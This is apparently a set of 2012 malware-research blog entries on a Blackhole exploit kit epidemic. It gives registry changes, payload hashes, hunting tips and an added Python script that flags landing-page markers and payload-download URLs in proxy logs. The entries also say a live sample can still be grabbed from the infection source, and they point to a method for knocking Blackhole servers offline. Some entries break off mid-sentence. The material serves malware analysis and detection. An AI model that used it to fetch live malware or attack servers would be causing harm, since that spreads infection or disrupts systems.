HKU\S-1-5-21-842925246-1425521274-308236825-500\SOFTWARE\Microsoft\Ocduge

with new value:

HKU\..\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
value name: AppData
data: C:\Documents and Settings\Administrator\Application Data <-- malware executable home base dir
It is an epidemic of Blackhole infection URLs in the wild.
Below is the analysis of the dropped malware so far:

6d84a5f24fe9c0f88a379ab0b6890cc59b76f2f1df7d1743a3e03a1786a57fe2
e580a63bc80e42a5a731754a1e7aaf489a396c8bf7d76f999e0af8ac39f40206
b87663fee7295c30d97b399ebbbea644c20e3f49778dfd8cc706574fceff7642

Hunting #Tips!
Below are the similarities of the current epidemic:
1. New obfuscation like below

2. Shellcode API of kernel32.dll and urlmon.dll was used to download, save, execute and daemonize the payload trojan, like:

3. Payload is packed by the newest method to avoid packerDB detection
4. Infected URLs can be grepped for ".php?f=" and ".php?h=" across almost all of MDL
5. This is the popular malware downloader used by the current epidemic:
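Tip 4 turns into a few lines of detection logic. The block below is an added example of mine, not code from this page: it runs the two landing-page markers from the tip (".php?f=" and ".php?h=") plus the payload URL shape seen in the shellcode above (a query carrying both `expid` and `fid`) over a handful of constructed proxy log lines, reports the hits defanged, and then correlates by client to find machines that fetched a landing page and a payload, i.e. the full chain. The log format, hostnames and client addresses are made up for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed proxy log lines for the example (hosts are reserved example
# names, not real infections); format is "timestamp client method url".
SAMPLE_LOG = """\
1346296410 192.0.2.10 GET http://www.example.com/index.html
1346296411 192.0.2.10 GET http://compromised.example.net/gallery/index.php?f=7a1c
1346296412 192.0.2.11 GET http://compromised.example.net/gallery/index.php?h=1
1346296413 192.0.2.12 GET http://pictures.example.org/gallery.php?id=42
1346296414 192.0.2.11 GET http://payload.example.net:8382/oshPbY?expid=4&fid=5
1346296415 192.0.2.13 GET http://www.example.com/search.php?q=hello
"""

# Landing-page markers from tip 4, matched case-insensitively on the URL.
LANDING_MARKERS = (".php?f=", ".php?h=")


def landing_hit(url: str) -> bool:
    """True when the URL carries one of the Blackhole landing-page markers."""
    low = url.lower()
    return any(marker in low for marker in LANDING_MARKERS)


def payload_hit(url: str) -> bool:
    """True when the query has both an expid and a fid parameter, the shape of
    the download URL recovered from the shellcode above."""
    qs = parse_qs(urlsplit(url).query)
    return "expid" in qs and "fid" in qs


def defang(url: str) -> str:
    """Make a URL non-clickable for reports (http -> hxxp, as this blog does)."""
    return re.sub(r"^http", "hxxp", url, flags=re.IGNORECASE)


def scan_log(text: str) -> list:
    """Return (client, kind, defanged_url) for each suspicious request."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue  # skip malformed lines rather than crash on them
        _ts, client, _method, url = parts[:4]
        if landing_hit(url):
            hits.append((client, "blackhole-landing", defang(url)))
        elif payload_hit(url):
            hits.append((client, "payload-download", defang(url)))
    return hits


def clients_with_full_chain(hits: list) -> set:
    """Clients that fetched both a landing page and a payload: the ones most
    likely to be infected and worth isolating first."""
    seen = {}
    for client, kind, _url in hits:
        seen.setdefault(client, set()).add(kind)
    wanted = {"blackhole-landing", "payload-download"}
    return {c for c, kinds in seen.items() if wanted <= kinds}


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for client, kind, url in found:
        print(f"{client} {kind} {url}")
    print("full chain:", sorted(clients_with_full_chain(found)))
```

On the sample log this flags the two landing-page requests and the one payload download, and reports 192.0.2.11 as the client that completed the chain; the `.php?f=` and `.php?h=` markers are deliberately loose, so treat a landing hit as a lead to pivot on, and the landing-plus-payload correlation as the stronger signal.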

Wednesday, 29 August 2012

I came up with this sample today from MDL; I analyzed it and wrote a report in VT at the URL below: https://www.virustotal.com/file/bb95e70c6ea8aaf8134bf9c9645aef715e4b4806004afbcfa9cd572b44939d82/analysis/1346296410/

My comment:
It is new injected infection code, kinda long, but Malzilla and jsunpack break it after 3 loops of tries. It was uploaded at 2012 Aug 30th 11:30 to the infected server. Very new. No wonder VT has a detection ratio of 2/42.

It redirects you to the infected payload using the Java exploit.

The payload detection ratio is 11/42 and can be viewed here:
https://www.virustotal.com/file/e580a63bc80e42a5a731754a1e7aaf489a396c8bf7d76f999e0af8ac39f40206/analysis/

You can grab the sample directly from the infection source, still up/alive.

Or contact me for more details.

#MalwareMustDie!

Just found this anonymous article posted on pastebin which explains "How to stop Blackhole Exploit Kit by using its vulnerability".

So many Blackhole servers came up to serve malware at the same time. The article explains a weakness in the security configuration of the nginx used by these Blackhole servers: the possibility of exploiting its redirection feature to create a loop and DoS its service.

Tuesday, 28 August 2012

We have a very positive response from researchers after releasing the Twitter forum of #MalwareMustDie. Thanks to the reverser and analyst friends who spontaneously joined and actively got involved, and also to those who monitored the stream. It was the busiest 6 hours of my life.

From the appearance you may see stuff like this:
Like you can see in the widget in the right panel of this blog..

In actual fact the admin panel went so crazy, like these snips:
which are rolling fast with mentions & follows. Boy, we're into something!

It is a good start indeed; let's make a go for it, a good 6 hours of first response!!
Thank you guys, you're all great, and let's stay in touch. Because I am compiling some honeypot reports for tomorrow & trying to build cases. Without leads we will work fast like today, cracking & yelling crazily in chaos.

That's the spirit boys! And we really think #MalwareMUSTdie!!

Friday, 24 August 2012

I am happy to report that Ammyy, the remote-access software firm, is now warning about the ongoing telephony scams.

When a support scammer tries to get you to hand over your credit card details in exchange for a fraudulent virus removal and system protection ‘service’, an important part of the scam involves persuading you to give them remote access to your system. They do this partly to convince you that

Saturday, 18 August 2012

Seems to be one thing or another lately, but there appears to be an issue with the mailbox for it-mate.co.uk, housed by Domain Monster. This issue is of an unknown cause at present, and because Domain Monster doesn't work 24/7 and is unreachable on Sundays, it won't be identified until Monday (assuming it doesn't resolve itself before then).

Suffice to say, the issue present prevents my